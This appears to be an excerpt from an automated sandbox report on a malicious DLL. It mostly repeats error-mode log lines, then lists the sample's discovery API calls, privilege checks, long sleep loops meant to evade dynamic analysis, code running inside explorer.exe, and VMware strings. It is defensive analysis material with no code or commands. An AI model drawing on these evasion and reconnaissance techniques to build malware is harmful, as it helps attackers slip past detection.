Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality to query network adapater information

Source: C:\Windows\System32\rundll32.exe	Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,	23_2_0000029F3B904D00
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,	30_2_089D8424
Source: C:\Windows\explorer.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,	30_2_089D7274

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 1756	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Window / User API: threadDelayed 8119	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 566
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3224
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5848
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 872
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 883

Found evasive API chain checking for process token information

Source: C:\Windows\System32\rundll32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll64.exe TID: 1356	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep count: 1756 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep time: -105360000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep count: 8119 > 30	Jump to behavior
Source: C:\Windows\System32\rundll32.exe TID: 7660	Thread sleep time: -487140000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 8172	Thread sleep count: 566 > 30
Source: C:\Windows\explorer.exe TID: 8172	Thread sleep time: -56600s >= -30000s
Source: C:\Windows\explorer.exe TID: 8164	Thread sleep count: 3224 > 30
Source: C:\Windows\explorer.exe TID: 8164	Thread sleep time: -3224000s >= -30000s
Source: C:\Windows\explorer.exe TID: 8164	Thread sleep count: 5848 > 30
Source: C:\Windows\explorer.exe TID: 8164	Thread sleep time: -5848000s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\explorer.exe	Code function: 30_2_089DA8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,		30_2_089DA8E0
Source: C:\Windows\explorer.exe	Code function: 30_2_089D2B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,		30_2_089D2B28

Source: C:\Windows\System32\loaddll64.exe	Thread delayed: delay time: 120000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
